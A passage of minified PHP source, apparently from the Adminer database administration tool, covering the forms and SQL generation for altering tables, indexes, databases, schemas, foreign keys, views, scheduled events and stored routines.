  9218. $o["default"]=null;
  9219. if($y==$K["auto_increment_col"])
  9220. $o["auto_increment"]=true;
  9221. $Of=process_field($o,$Mh);
  9222. $Ca[]=array($o["orig"],$Of,$_a);
  9223. if($Of!=process_field($ff,$ff)) {
  9224. $p[]=array($o["orig"],$Of,$_a);
  9225. if($o["orig"]!=""||$_a)
  9226. $ai=true;
  9227. }
  9228. if($q!==null)
  9229. $Pc[idf_escape($o["field"])]=($a!=""&&$x!="sqlite"?"ADD":" ").format_foreign_key(array('table'=>$Rc[$o["type"]],'source'=>array($o["field"]),'target'=>array($Mh["field"]),'on_delete'=>$o["on_delete"]));
  9230. $_a=" AFTER ".idf_escape($o["field"]);
  9231. }elseif($o["orig"]!="") {
  9232. $ai=true;
  9233. $p[]=array($o["orig"]);
  9234. }
  9235. if($o["orig"]!="") {
  9236. $ff=next($gf);
  9237. if(!$ff)
  9238. $_a="";
  9239. }
  9240. }
  9241. $tf="";
  9242. if($rf[$K["partition_by"]]) {
  9243. $uf=array();
  9244. if($K["partition_by"]=='RANGE'||$K["partition_by"]=='LIST') {
  9245. foreach(array_filter($K["partition_names"]) as $y=>$X) {
  9246. $Y=$K["partition_values"][$y];
  9247. $uf[]="\n PARTITION ".idf_escape($X)." VALUES ".($K["partition_by"]=='RANGE'?"LESS THAN":"IN").($Y!=""?" ($Y)":" MAXVALUE");
  9248. }
  9249. }
  9250. $tf.="\nPARTITION BY $K[partition_by]($K[partition])".($uf?" (".implode(",",$uf)."\n)":($K["partitions"]?" PARTITIONS ".(+$K["partitions"]):""));
  9251. }elseif(support("partitioning")&&preg_match("~partitioned~",$S["Create_options"]))
  9252. $tf.="\nREMOVE PARTITIONING";
  9253. $pe='Table has been altered.';
  9254. if($a=="") {
  9255. cookie("adminer_engine",$K["Engine"]);
  9256. $pe='Table has been created.';
  9257. }
  9258. $C=trim($K["name"]);
  9259. queries_redirect(ME.(support("table")?"table=":"select=").urlencode($C),$pe, alter_table($a,$C, ($x=="sqlite"&&($ai||$Pc)?$Ca:$p),$Pc, ($K["Comment"]!=$S["Comment"]?$K["Comment"]:null),($K["Engine"]&&$K["Engine"]!=$S["Engine"]?$K["Engine"]:""),($K["Collation"]&&$K["Collation"]!=$S["Collation"]?$K["Collation"]:""),($K["Auto_increment"]!=""?number($K["Auto_increment"]):""),$tf));
  9260. }
  9261. }
  9262. page_header(($a!=""?'Alter table':'Create table'),$n, array("table"=>$a), h($a));
  9263. if(!$_POST) {
  9264. $K=array("Engine"=>$_COOKIE["adminer_engine"],"fields"=>array(array("field"=>"","type"=>(isset($Oh["int"])?"int":(isset($Oh["integer"])?"integer":"")))),"partition_names"=>array(""));
  9265. if($a!="") {
  9266. $K=$S;
  9267. $K["name"]=$a;
  9268. $K["fields"]=array();
  9269. if(!$_GET["auto_increment"])
  9270. $K["Auto_increment"]="";
  9271. foreach($gf as $o) {
  9272. $o["has_default"]=isset($o["default"]);
  9273. $K["fields"][]=$o;
  9274. }
  9275. if(support("partitioning")) {
  9276. $Wc="FROM information_schema.PARTITIONS WHERE TABLE_SCHEMA = ".q(DB)." AND TABLE_NAME = ".q($a);
  9277. $I=$g->query("SELECT PARTITION_METHOD, PARTITION_ORDINAL_POSITION, PARTITION_EXPRESSION $Wc ORDER BY PARTITION_ORDINAL_POSITION DESC LIMIT 1");
  9278. list($K["partition_by"],$K["partitions"],$K["partition"])=$I->fetch_row();
  9279. $uf=get_key_vals("SELECT PARTITION_NAME, PARTITION_DESCRIPTION $Wc AND PARTITION_NAME != '' ORDER BY PARTITION_ORDINAL_POSITION");
  9280. $uf[""]="";
  9281. $K["partition_names"]=array_keys($uf);
  9282. $K["partition_values"]=array_values($uf);
  9283. }
  9284. }
  9285. }
  9286. $mb=collations();
  9287. $nc=engines();
  9288. foreach($nc as $mc) {
  9289. if(!strcasecmp($mc,$K["Engine"])) {
  9290. $K["Engine"]=$mc;
  9291. break;
  9292. }
  9293. }
  9294. echo '
  9295. <form action="" method="post" id="form">
  9296. <p>
  9297. ';
  9298. if(support("columns")||$a=="") {
  9299. echo 'Table name: <input type="text" name="name" maxlength="64" value="', h($K["name"]), '" autocapitalize="off">
  9300. ';
  9301. if($a==""&&!$_POST) {
  9302. echo"<script type='text/javascript'>focus(document.getElementById('form')['name']);</script>";
  9303. }
  9304. echo ($nc?"<select name='Engine' onchange='helpClose();'".on_help("getTarget(event).value",1).">".optionlist(array(""=>"(".'engine'.")")+$nc,$K["Engine"])."</select>":""), ' ', ($mb&&!preg_match("~sqlite|mssql~",$x)?html_select("Collation",array(""=>"(".'collation'.")")+$mb,$K["Collation"]):""), ' <input type="submit" value="Save">';
  9305. }
  9306. echo '';
  9307. if(support("columns")) {
  9308. echo '<table cellspacing="0" id="menustable edit-fields" class="nowrap" border="1">
  9309. ';
  9310. $rb=($_POST?$_POST["comments"]:$K["Comment"]!="");
  9311. if(!$_POST&&!$rb) {
  9312. foreach($K["fields"] as $o) {
  9313. if($o["comment"]!="") {
  9314. $rb=true;
  9315. break;
  9316. }
  9317. }
  9318. }
  9319. edit_fields($K["fields"],$mb, "TABLE",$Rc,$rb);
  9320. echo '</table>
  9321. <p>
  9322. Auto Increment: <input type="number" name="Auto_increment" size="6" value="', h($K["Auto_increment"]), '">
  9323. ', checkbox("defaults",1, true, 'Default values', "columnShow(this.checked, 5)","jsonly");
  9324. if(!$_POST["defaults"]) {
  9325. echo '<script type="text/javascript">editingHideDefaults()</script>';
  9326. }
  9327. echo (support("comment")?"<label><input type='checkbox' name='comments' value='1' class='jsonly' onclick=\"columnShow(this.checked, 6); toggle('Comment'); if (this.checked) this.form['Comment'].focus();\"".($rb?" checked":"").">".'Comment'."</label>".' <input type="text" name="Comment" id="Comment" value="'.h($K["Comment"]).'" maxlength="'.($g->server_info>=5.5?2048:60).'"'.($rb?'':' class="hidden"').'>':''), '<p>
  9328. <input type="submit" value="Save">
  9329. ';
  9330. }
  9331. echo '';
  9332. if($a!="") {
  9333. echo '<input type="submit" name="drop" value="Drop"', confirm(), '>';
  9334. }
  9335. if(support("partitioning")) {
  9336. $sf=preg_match('~RANGE|LIST~',$K["partition_by"]);
  9337. print_fieldset("partition",'Partition by',$K["partition_by"]);
  9338. echo '<p>', "<select name='partition_by' onchange='partitionByChange(this);'".on_help("getTarget(event).value.replace(/./, 'PARTITION BY \$&')",1).">".optionlist(array(""=>"")+$rf,$K["partition_by"])."</select>",'(<input type="text" name="partition" value="', h($K["partition"]), '">)
  9339. Partitions: <input type="number" name="partitions" class="size', ($sf||!$K["partition_by"]?" hidden":""), '" value="', h($K["partitions"]), '">
  9340. <table border="1" cellspacing="0" id="menustable partition-table"', ($sf?"":" class='hidden'"), '>
  9341. <thead><tr><td>Partition name<td>Values</thead>
  9342. ';
  9343. foreach($K["partition_names"] as $y=>$X) {
  9344. echo '<tr>','<td><input type="text" name="partition_names[]" value="'.h($X).'"'.($y==count($K["partition_names"])-1?' onchange="partitionNameChange(this);"':'').' autocapitalize="off">','<td><input type="text" name="partition_values[]" value="'.h($K["partition_values"][$y]).'">';
  9345. }
  9346. echo '</table>
  9347. </div></fieldset>
  9348. ';
  9349. }
  9350. echo '<input type="hidden" name="token" value="',$Ah, '">
  9351. </form>
  9352. ';
  9353. }elseif(isset($_GET["indexes"])) {
  9354. $a=$_GET["indexes"];
  9355. $rd=array("PRIMARY","UNIQUE","INDEX");
  9356. $S=table_status($a, true);
  9357. if(preg_match('~MyISAM|M?aria'.($g->server_info>=5.6?'|InnoDB':'').'~i',$S["Engine"]))
  9358. $rd[]="FULLTEXT";
  9359. if(preg_match('~MyISAM|M?aria'.($g->server_info>=5.7?'|InnoDB':'').'~i',$S["Engine"]))
  9360. $rd[]="SPATIAL";
  9361. $w=indexes($a);
  9362. $Hf=array();
  9363. if($x=="mongo") {
  9364. $Hf=$w["_id_"];
  9365. unset($rd[0]);
  9366. unset($w["_id_"]);
  9367. }
  9368. $K=$_POST;
  9369. if($_POST&&!$n&&!$_POST["add"]&&!$_POST["drop_col"]) {
  9370. $c=array();
  9371. foreach($K["indexes"] as $v) {
  9372. $C=$v["name"];
  9373. if(in_array($v["type"],$rd)) {
  9374. $f=array();
  9375. $Zd=array();
  9376. $Ob=array();
  9377. $O=array();
  9378. ksort($v["columns"]);
  9379. foreach($v["columns"] as $y=>$e) {
  9380. if($e!="") {
  9381. $Yd=$v["lengths"][$y];
  9382. $Nb=$v["descs"][$y];
  9383. $O[]=idf_escape($e).($Yd?"(".(+$Yd).")":"").($Nb?" DESC":"");
  9384. $f[]=$e;
  9385. $Zd[]=($Yd?$Yd:null);
  9386. $Ob[]=$Nb;
  9387. }
  9388. }
  9389. if($f) {
  9390. $wc=$w[$C];
  9391. if($wc) {
  9392. ksort($wc["columns"]);
  9393. ksort($wc["lengths"]);
  9394. ksort($wc["descs"]);
  9395. if($v["type"]==$wc["type"]&&array_values($wc["columns"])===$f&&(!$wc["lengths"]||array_values($wc["lengths"])===$Zd)&&array_values($wc["descs"])===$Ob) {
  9396. unset($w[$C]);
  9397. continue;
  9398. }
  9399. }
  9400. $c[]=array($v["type"],$C,$O);
  9401. }
  9402. }
  9403. }
  9404. foreach($w as $C=>$wc)
  9405. $c[]=array($wc["type"],$C,"DROP");
  9406. if(!$c)
  9407. redirect(ME."table=".urlencode($a));
  9408. queries_redirect(ME."table=".urlencode($a), 'Indexes have been altered.', alter_indexes($a,$c));
  9409. }
  9410. page_header('Indexes',$n, array("table"=>$a), h($a));
  9411. $p=array_keys(fields($a));
  9412. if($_POST["add"]) {
  9413. foreach($K["indexes"] as $y=>$v) {
  9414. if($v["columns"][count($v["columns"])]!="")
  9415. $K["indexes"][$y]["columns"][]="";
  9416. }
  9417. $v=end($K["indexes"]);
  9418. if($v["type"]||array_filter($v["columns"], 'strlen'))
  9419. $K["indexes"][]=array("columns"=>array(1=>""));
  9420. }
  9421. if(!$K) {
  9422. foreach($w as $y=>$v) {
  9423. $w[$y]["name"]=$y;
  9424. $w[$y]["columns"][]="";
  9425. }
  9426. $w[]=array("columns"=>array(1=>""));
  9427. $K["indexes"]=$w;
  9428. }
  9429.  
  9430. echo'<form action="" method="post">
  9431. <table id="menustable" cellspacing="0" class="nowrap" border="1">
  9432. <thead><tr>
  9433. <th id="label-type">Index Type
  9434. <td><input type="submit" class="wayoff">Column (length)
  9435. <th id="label-name">Name
  9436. <td><noscript><input type="image" class="icon" name="add[0]" src="data:image/png;base64,R0lGODlhEgASAIEAMe7u7gAAgJmZmQAAACH5BAEAAAEALAAAAAASABIAAQIhhI+py+0PTQjxzCopvm/6rykgCHGVGaFliLXuI8TyTMsFADs=" alt="+" title="Add next"></noscript>&nbsp;
  9437. </thead>';
  9438.  
  9439. if($Hf) {
  9440. echo "<tr><td>PRIMARY<td>";
  9441. foreach($Hf["columns"] as $y=>$e) {
  9442. echo select_input(" disabled",$p,$e), "<label><input disabled type='checkbox'>".'descending'."</label> ";
  9443. }
  9444. echo "<td><td>\n";
  9445. }
  9446. $Hd=1;
  9447. foreach($K["indexes"] as $v) {
  9448. if(!$_POST["drop_col"]||$Hd!=key($_POST["drop_col"])) {
  9449. echo "<tr><td>".html_select("indexes[$Hd][type]",array(-1=>"")+$rd,$v["type"], ($Hd==count($K["indexes"])?"indexesAddRow(this);":1), "label-type"), "<td>";
  9450. ksort($v["columns"]);
  9451. $s=1;
  9452. foreach($v["columns"] as $y=>$e) {
  9453. echo "<span>".select_input(" name='indexes[$Hd][columns][$s]' onchange=\"".($s==count($v["columns"])?"indexesAddColumn":"indexesChangeColumn")."(this, '".h(js_escape($x=="sql"?"":$_GET["indexes"]."_"))."');\" title='".'Column'."'",($p?array_combine($p,$p):$p),$e),($x=="sql"||$x=="mssql"?"<input type='number' name='indexes[$Hd][lengths][$s]' class='size' value='".h($v["lengths"][$y])."' title='".'Length'."'>":""),($x!="sql"?checkbox("indexes[$Hd][descs][$s]",1,$v["descs"][$y], 'descending'):""), " </span>";
  9454. $s++;
  9455. }
  9456. echo "<td><input name='indexes[$Hd][name]' value='".h($v["name"])."' autocapitalize='off' aria-labelledby='label-name'>\n","<td><input type='image' class='icon' name='drop_col[$Hd]' src='data:image/png;base64,R0lGODlhEgASAIEAMe7u7gAAgJmZmQAAACH5BAEAAAEALAAAAAASABIAAQIjhI+py+0PIwph1kZvfnnDLoFfd2GU4THnsUruC0fCTNc2XQAAOw==' alt='x' title='".'Remove'."' onclick=\"return !editingRemoveRow(this, 'indexes\$1[type]');\">\n";
  9457. }
  9458. $Hd++;
  9459. }
  9460. echo '</table><p>
  9461. <input type="submit" value="Save">
  9462. <input type="hidden" name="token" value="',$Ah, '">
  9463. </form>';
  9464. }elseif(isset($_GET["database"])) {
  9465. $K=$_POST;
  9466. if($_POST&&!$n&&!isset($_POST["add_x"])) {
  9467. $C=trim($K["name"]);
  9468. if($_POST["drop"]) {
  9469. $_GET["db"]="";
  9470. queries_redirect(remove_from_uri("db|database"), 'Database has been dropped.', drop_databases(array(DB)));
  9471. }elseif(DB!==$C) {
  9472. if(DB!="") {
  9473. $_GET["db"]=$C;
  9474. queries_redirect(preg_replace('~\bdb=[^&]*&~','', ME)."db=".urlencode($C), 'Database has been renamed.', rename_database($C,$K["collation"]));
  9475. }else{
  9476. $l=explode("\n",str_replace("\r","",$C));
  9477. $Xg=true;
  9478. $Sd="";
  9479. foreach($l as $m) {
  9480. if(count($l)==1||$m!="") {
  9481. if(!create_database($m,$K["collation"]))
  9482. $Xg=false;
  9483. $Sd=$m;
  9484. }
  9485. }
  9486. restart_session();
  9487. set_session("dbs",null);
  9488. queries_redirect(ME."db=".urlencode($Sd), 'Database has been created.',$Xg);
  9489. }
  9490. }else{
  9491. if(!$K["collation"])
  9492. redirect(substr(ME, 0, -1));
  9493. query_redirect("ALTER DATABASE ".idf_escape($C).(preg_match('~^[a-z0-9_]+$~i',$K["collation"])?" COLLATE $K[collation]":""), substr(ME, 0, -1), 'Database has been altered.');
  9494. }
  9495. }
  9496. page_header(DB!=""?'Alter database':'Create database',$n, array(), h(DB));
  9497. $mb=collations();
  9498. $C=DB;
  9499. if($_POST)
  9500. $C=$K["name"];
  9501. elseif(DB!="")
  9502. $K["collation"]=db_collation(DB,$mb);
  9503. elseif($x=="sql") {
  9504. foreach(get_vals("SHOW GRANTS") as $Yc) {
  9505. if(preg_match('~ ON (`(([^\\\\`]|``|\\\\.)*)%`\\.\\*)?~',$Yc,$B)&&$B[1]) {
  9506. $C=stripcslashes(idf_unescape("`$B[2]`"));
  9507. break;
  9508. }
  9509. }
  9510. }
  9511. echo'<form action="" method="post"><p>', ($_POST["add_x"]||strpos($C, "\n")?'<textarea id="name" name="name" rows="10" cols="40">'.h($C).'</textarea><br>':'<input type="text" name="name" id="name" value="'.h($C).'" maxlength="64" autocapitalize="off">')."\n".($mb?html_select("collation",array(""=>"(".'collation'.")")+$mb,$K["collation"]).doc_link(array('sql'=>"charset-charsets.html",'mssql'=>"ms187963.aspx")):"");
  9512. echo'<script type="text/javascript">focus(document.getElementById("name"));</script>
  9513. <input type="submit" value="Save">';
  9514. if(DB!="")
  9515. echo "<input type='submit' name='drop' value='".'Drop'."'".confirm().">\n";
  9516. elseif(!$_POST["add_x"]&&$_GET["db"]=="")
  9517. echo "<input type='image' class='icon' name='add' src='data:image/png;base64,R0lGODlhEgASAIEAMe7u7gAAgJmZmQAAACH5BAEAAAEALAAAAAASABIAAQIhhI+py+0PTQjxzCopvm/6rykgCHGVGaFliLXuI8TyTMsFADs=' alt='+' title='".'Add next'."'>\n";
  9518. echo '<input type="hidden" name="token" value="',$Ah, '">
  9519. </form>';
  9520. }elseif(isset($_GET["scheme"])) {
  9521. $K=$_POST;
  9522. if($_POST&&!$n) {
  9523. $_=preg_replace('~ns=[^&]*&~','', ME)."ns=";
  9524. if($_POST["drop"])
  9525. query_redirect("DROP SCHEMA ".idf_escape($_GET["ns"]),$_, 'Schema has been dropped.');
  9526. else {
  9527. $C=trim($K["name"]);
  9528. $_.=urlencode($C);
  9529. if($_GET["ns"]=="")
  9530. query_redirect("CREATE SCHEMA ".idf_escape($C),$_, 'Schema has been created.');
  9531. elseif($_GET["ns"]!=$C)
  9532. query_redirect("ALTER SCHEMA ".idf_escape($_GET["ns"])." RENAME TO ".idf_escape($C),$_, 'Schema has been altered.');
  9533. else
  9534. redirect($_);
  9535. }
  9536. }
  9537. page_header($_GET["ns"]!=""?'Alter schema':'Create schema',$n);
  9538. if(!$K)
  9539. $K["name"]=$_GET["ns"];
  9540. echo '<form action="" method="post">
  9541. <p><input type="text" name="name" id="name" value="'.h($K["name"]).'" autocapitalize="off">
  9542. <script type=\'text/javascript\'>focus(document.getElementById(\'name\'));</script>
  9543. <input type="submit" value="Save">';
  9544. if($_GET["ns"]!="")
  9545. echo "<input type='submit' name='drop' value='".'Drop'."'".confirm().">\n";
  9546. echo '<input type="hidden" name="token" value="',$Ah, '">
  9547. </form>
  9548. ';
  9549. }elseif(isset($_GET["call"])) {
  9550. $da=$_GET["call"];
  9551. page_header('Call'.": ".h($da),$n);
  9552. $og=routine($da, (isset($_GET["callf"])?"FUNCTION":"PROCEDURE"));
  9553. $pd=array();
  9554. $kf=array();
  9555. foreach($og["fields"] as $s=>$o) {
  9556. if(substr($o["inout"], -3)=="OUT")
  9557. $kf[$s]="@".idf_escape($o["field"])." AS ".idf_escape($o["field"]);
  9558. if(!$o["inout"]||substr($o["inout"], 0, 2)=="IN")
  9559. $pd[]=$s;
  9560. }
  9561. if(!$n&&$_POST) {
  9562. $Xa=array();
  9563. foreach($og["fields"] as $y=>$o) {
  9564. if(in_array($y,$pd)) {
  9565. $X=process_input($o);
  9566. if($X===false)
  9567. $X="''";
  9568. if(isset($kf[$y]))
  9569. $g->query("SET @".idf_escape($o["field"])." = $X");
  9570. }
  9571. $Xa[]=(isset($kf[$y])?"@".idf_escape($o["field"]):$X);
  9572. }
  9573. $H=(isset($_GET["callf"])?"SELECT":"CALL")." ".table($da)."(".implode(",",$Xa).")";
  9574. echo "<p><span class='jush-$x'>".h($H)."</span> <a href='".h(ME)."sql=".urlencode($H)."'>".'Edit'."</a>\n";
  9575. if(!$g->multi_query($H))
  9576. echo "<p class='error'>".error()."\n";
  9577. else {
  9578. $h=connect();
  9579. if(is_object($h))
  9580. $h->select_db(DB);
  9581. do {
  9582. $I=$g->store_result();
  9583. if(is_object($I))
  9584. select($I,$h);
  9585. else
  9586. echo "<p class='message'>".lang(array('Routine has been called, %d row affected.','Routine has been called, %d rows affected.'),$g->affected_rows)."\n";
  9587. } while($g->next_result());
  9588. if($kf)
  9589. select($g->query("SELECT ".implode(",",$kf)));
  9590. }
  9591. }
  9592. echo'<form action="" method="post">';
  9593. if($pd) {
  9594. echo "<table id='menustable' cellspacing='0' border='1'>\n";
  9595. foreach($pd as $y) {
  9596. $o=$og["fields"][$y];
  9597. $C=$o["field"];
  9598. echo "<tr><td>".$b->fieldName($o);
  9599. $Y=$_POST["fields"][$C];
  9600. if($Y!="") {
  9601. if($o["type"]=="enum")
  9602. $Y=+$Y;
  9603. if($o["type"]=="set")
  9604. $Y=array_sum($Y);
  9605. }
  9606. input($o,$Y, (string) $_POST["function"][$C]);
  9607. echo "\n";
  9608. }
  9609. echo "</table>\n";
  9610. }
  9611. echo '<p>
  9612. <input type="submit" value="Call">
  9613. <input type="hidden" name="token" value="',$Ah, '">
  9614. </form>
  9615. ';
  9616. }elseif(isset($_GET["foreign"])) {
  9617. $a=$_GET["foreign"];
  9618. $C=$_GET["name"];
  9619. $K=$_POST;
  9620. if($_POST&&!$n&&!$_POST["add"]&&!$_POST["change"]&&!$_POST["change-js"]) {
  9621. $pe=($_POST["drop"]?'Foreign key has been dropped.':($C!=""?'Foreign key has been altered.':'Foreign key has been created.'));
  9622. $A=ME."table=".urlencode($a);
  9623. if(!$_POST["drop"]) {
  9624. $K["source"]=array_filter($K["source"], 'strlen');
  9625. ksort($K["source"]);
  9626. $lh=array();
  9627. foreach($K["source"] as $y=>$X)
  9628. $lh[$y]=$K["target"][$y];
  9629. $K["target"]=$lh;
  9630. }
  9631. if($x=="sqlite")
  9632. queries_redirect($A,$pe, recreate_table($a,$a, array(), array(), array(" $C"=>($_POST["drop"]?"":" ".format_foreign_key($K)))));
  9633. else {
  9634. $c="ALTER TABLE ".table($a);
  9635. $Xb="\nDROP ".($x=="sql"?"FOREIGN KEY ":"CONSTRAINT ").idf_escape($C);
  9636. if($_POST["drop"])
  9637. query_redirect($c.$Xb,$A,$pe);
  9638. else {
  9639. query_redirect($c.($C!=""?"$Xb,":"")."\nADD".format_foreign_key($K),$A,$pe);
  9640. $n='Source and target columns must have the same data type, there must be an index on the target columns and referenced data must exist.'."<br>$n";
  9641. }
  9642. }
  9643. }
  9644. page_header('Foreign key',$n, array("table"=>$a), h($a));
  9645. if($_POST) {
  9646. ksort($K["source"]);
  9647. if($_POST["add"])
  9648. $K["source"][]="";
  9649. elseif($_POST["change"]||$_POST["change-js"])
  9650. $K["target"]=array();
  9651. }elseif($C!="") {
  9652. $Rc=foreign_keys($a);
  9653. $K=$Rc[$C];
  9654. $K["source"][]="";
  9655. }else{
  9656. $K["table"]=$a;
  9657. $K["source"]=array("");
  9658. }
  9659. $Ng=array_keys(fields($a));
  9660. $lh=($a===$K["table"]?$Ng:array_keys(fields($K["table"])));
  9661. $Zf=array_keys(array_filter(table_status('', true), 'fk_support'));
  9662. echo '
  9663. <form action="" method="post">
  9664. <p>
  9665. ';
  9666. if($K["db"]==""&&$K["ns"]=="") {
  9667. echo 'Target table:
  9668. ', html_select("table",$Zf,$K["table"], "this.form['change-js'].value = '1'; this.form.submit();"), '<input type="hidden" name="change-js" value="">
  9669. <noscript><p><input type="submit" name="change" value="Change"></noscript>
  9670. <table id="menustable" cellspacing="0" border="1">
  9671. <thead><tr><th id="label-source">Source<th id="label-target">Target</thead>
  9672. ';
  9673. $Hd=0;
  9674. foreach($K["source"] as $y=>$X) {
  9675. echo "<tr>","<td>".html_select("source[".(+$y)."]",array(-1=>"")+$Ng,$X, ($Hd==count($K["source"])-1?"foreignAddRow(this);":1), "label-source"), "<td>".html_select("target[".(+$y)."]",$lh,$K["target"][$y], 1, "label-target");
  9676. $Hd++;
  9677. }
  9678. echo '</table>
  9679. <p>
  9680. ON DELETE: ', html_select("on_delete",array(-1=>"")+explode("|",$Qe),$K["on_delete"]), ' ON UPDATE: ', html_select("on_update",array(-1=>"")+explode("|",$Qe),$K["on_update"]), doc_link(array('sql'=>"innodb-foreign-key-constraints.html",'pgsql'=>"sql-createtable.html#SQL-CREATETABLE-REFERENCES",'mssql'=>"ms174979.aspx",'oracle'=>"clauses002.htm#sthref2903")), '<p>
  9681. <input type="submit" value="Save">
  9682. <noscript><p><input type="submit" name="add" value="Add column"></noscript>
  9683. ';
  9684. }
  9685. if($C!="") {
  9686. echo '<input type="submit" name="drop" value="Drop"', confirm(), '>';
  9687. }
  9688. echo '<input type="hidden" name="token" value="',$Ah, '">
  9689. </form>
  9690. ';
  9691. }elseif(isset($_GET["view"])) {
  9692. $a=$_GET["view"];
  9693. $K=$_POST;
  9694. $hf="VIEW";
  9695. if($x=="pgsql"&&$a!="") {
  9696. $P=table_status($a);
  9697. $hf=strtoupper($P["Engine"]);
  9698. }
  9699. if($_POST&&!$n) {
  9700. $C=trim($K["name"]);
  9701. $Fa=" AS\n$K[select]";
  9702. $A=ME."table=".urlencode($C);
  9703. $pe='View has been altered.';
  9704. $U=($_POST["materialized"]?"MATERIALIZED VIEW":"VIEW");
  9705. if(!$_POST["drop"]&&$a==$C&&$x!="sqlite"&&$U=="VIEW"&&$hf=="VIEW")
  9706. query_redirect(($x=="mssql"?"ALTER":"CREATE OR REPLACE")." VIEW ".table($C).$Fa,$A,$pe);
  9707. else {
  9708. $nh=$C."_adminer_".uniqid();
  9709. drop_create("DROP $hf ".table($a), "CREATE $U ".table($C).$Fa, "DROP $U ".table($C), "CREATE $U ".table($nh).$Fa, "DROP $U ".table($nh),($_POST["drop"]?substr(ME, 0, -1):$A), 'View has been dropped.',$pe, 'View has been created.',$a,$C);
  9710. }
  9711. }
  9712. if(!$_POST&&$a!="") {
  9713. $K=view($a);
  9714. $K["name"]=$a;
  9715. $K["materialized"]=($hf!="VIEW");
  9716. if(!$n)
  9717. $n=error();
  9718. }
  9719. page_header(($a!=""?'Alter view':'Create view'),$n, array("table"=>$a), h($a));
  9720. echo '<form action="" method="post">
  9721. <p>Name: <input type="text" name="name" value="', h($K["name"]), '" maxlength="64" autocapitalize="off">', (support("materializedview")?" ".checkbox("materialized",1,$K["materialized"], 'Materialized view'):""), '<p>';
  9722. textarea("select",$K["select"]);
  9723. echo '<p><input type="submit" value="Save">';
  9724. if($_GET["view"]!="") {
  9725. echo '<input type="submit" name="drop" value="Drop"', confirm(), '>';
  9726. }
  9727. echo '<input type="hidden" name="token" value="',$Ah, '">
  9728. </form>';
  9729. }elseif(isset($_GET["event"])) {
  9730. $aa=$_GET["event"];
  9731. $zd=array("YEAR","QUARTER","MONTH","DAY","HOUR","MINUTE","WEEK","SECOND","YEAR_MONTH","DAY_HOUR","DAY_MINUTE","DAY_SECOND","HOUR_MINUTE","HOUR_SECOND","MINUTE_SECOND");
  9732. $Tg=array("ENABLED"=>"ENABLE","DISABLED"=>"DISABLE","SLAVESIDE_DISABLED"=>"DISABLE ON SLAVE");
  9733. $K=$_POST;
  9734. if($_POST&&!$n) {
  9735. if($_POST["drop"])
  9736. query_redirect("DROP EVENT ".idf_escape($aa), substr(ME, 0, -1), 'Event has been dropped.');
  9737. elseif(in_array($K["INTERVAL_FIELD"],$zd)&&isset($Tg[$K["STATUS"]])) {
  9738. $tg="\nON SCHEDULE ".($K["INTERVAL_VALUE"]?"EVERY ".q($K["INTERVAL_VALUE"])." $K[INTERVAL_FIELD]".($K["STARTS"]?" STARTS ".q($K["STARTS"]):"").($K["ENDS"]?" ENDS ".q($K["ENDS"]):""):"AT ".q($K["STARTS"]))." ON COMPLETION".($K["ON_COMPLETION"]?"":" NOT")." PRESERVE";
  9739. queries_redirect(substr(ME, 0, -1),($aa!=""?'Event has been altered.':'Event has been created.'), queries(($aa!=""?"ALTER EVENT ".idf_escape($aa).$tg.($aa!=$K["EVENT_NAME"]?"\nRENAME TO ".idf_escape($K["EVENT_NAME"]):""):"CREATE EVENT ".idf_escape($K["EVENT_NAME"]).$tg)."\n".$Tg[$K["STATUS"]]." COMMENT ".q($K["EVENT_COMMENT"]).rtrim(" DO\n$K[EVENT_DEFINITION]",";").";"));
  9740. }
  9741. }
  9742. page_header(($aa!=""?'Alter event'.": ".h($aa):'Create event'),$n);
  9743. if(!$K&&$aa!="") {
  9744. $L=get_rows("SELECT * FROM information_schema.EVENTS WHERE EVENT_SCHEMA = ".q(DB)." AND EVENT_NAME = ".q($aa));
  9745. $K=reset($L);
  9746. }
  9747. echo '
  9748. <form action="" method="post">
  9749. <table id="menustable" cellspacing="0" border="1">
  9750. <tr><td>Name<td><input type="text" name="EVENT_NAME" value="', h($K["EVENT_NAME"]), '" maxlength="64" autocapitalize="off">
  9751. <tr><td title="datetime">Start<td><input type="text" name="STARTS" value="', h("$K[EXECUTE_AT]$K[STARTS]"), '">
  9752. <tr><td title="datetime">End<td><input type="text" name="ENDS" value="', h($K["ENDS"]), '">
  9753. <tr><td>Every<td><input type="number" name="INTERVAL_VALUE" value="', h($K["INTERVAL_VALUE"]), '" class="size"> ', html_select("INTERVAL_FIELD",$zd,$K["INTERVAL_FIELD"]), '<tr><td>Status<td>', html_select("STATUS",$Tg,$K["STATUS"]), '<tr><td>Comment<td><input type="text" name="EVENT_COMMENT" value="', h($K["EVENT_COMMENT"]), '" maxlength="64">
  9754. <tr><td>&nbsp;<td>', checkbox("ON_COMPLETION","PRESERVE",$K["ON_COMPLETION"]=="PRESERVE",'On completion preserve'), '</table>
  9755. <p>';
  9756. textarea("EVENT_DEFINITION",$K["EVENT_DEFINITION"]);
  9757. echo '<p><input type="submit" value="Save">';
  9758. if($aa!="") {
  9759. echo '<input type="submit" name="drop" value="Drop"', confirm(), '>';
  9760. }
  9761. echo '<input type="hidden" name="token" value="',$Ah, '"></form>';
  9762. }elseif(isset($_GET["procedure"])) {
  9763. $da=$_GET["procedure"];
  9764. $og=(isset($_GET["function"])?"FUNCTION":"PROCEDURE");
  9765. $K=$_POST;
  9766. $K["fields"]=(array) $K["fields"];
  9767. if($_POST&&!process_fields($K["fields"])&&!$n) {
  9768. $nh="$K[name]_adminer_".uniqid();
  9769. drop_create("DROP $og ".idf_escape($da), create_routine($og,$K), "DROP $og ".idf_escape($K["name"]), create_routine($og, array(
  9770. "name"=>$nh
  9771. )+$K), "DROP $og ".idf_escape($nh), substr(ME, 0, -1), 'Routine has been dropped.','Routine has been altered.','Routine has been created.',$da,$K["name"]);
  9772. }
  9773. page_header(($da!=""?(isset($_GET["function"])?'Alter function':'Alter procedure').": ".h($da):(isset($_GET["function"])?'Create function':'Create procedure')),$n);
  9774. if(!$_POST&&$da!="") {
  9775. $K=routine($da,$og);
  9776. $K["name"]=$da;
  9777. }
  9778. $mb=get_vals("SHOW CHARACTER SET");
  9779. sort($mb);
  9780. $pg=routine_languages();
  9781. echo '
  9782. <form action="" method="post" id="form">
  9783. <p>Name: <input type="text" name="name" value="', h($K["name"]), '" maxlength="64" autocapitalize="off">
  9784. ', ($pg?'Language'.": ".html_select("language",$pg,$K["language"]):""), '<input type="submit" value="Save">
  9785. <table id="menustable" cellspacing="0" class="nowrap" border="1">
  9786. ';
  9787. edit_fields($K["fields"],$mb,$og);
  9788. if(isset($_GET["function"])) {
  9789. echo "<tr><td>".'Return type';
  9790. edit_type("returns",$K["returns"],$mb);
  9791. }
  9792. echo '</table>
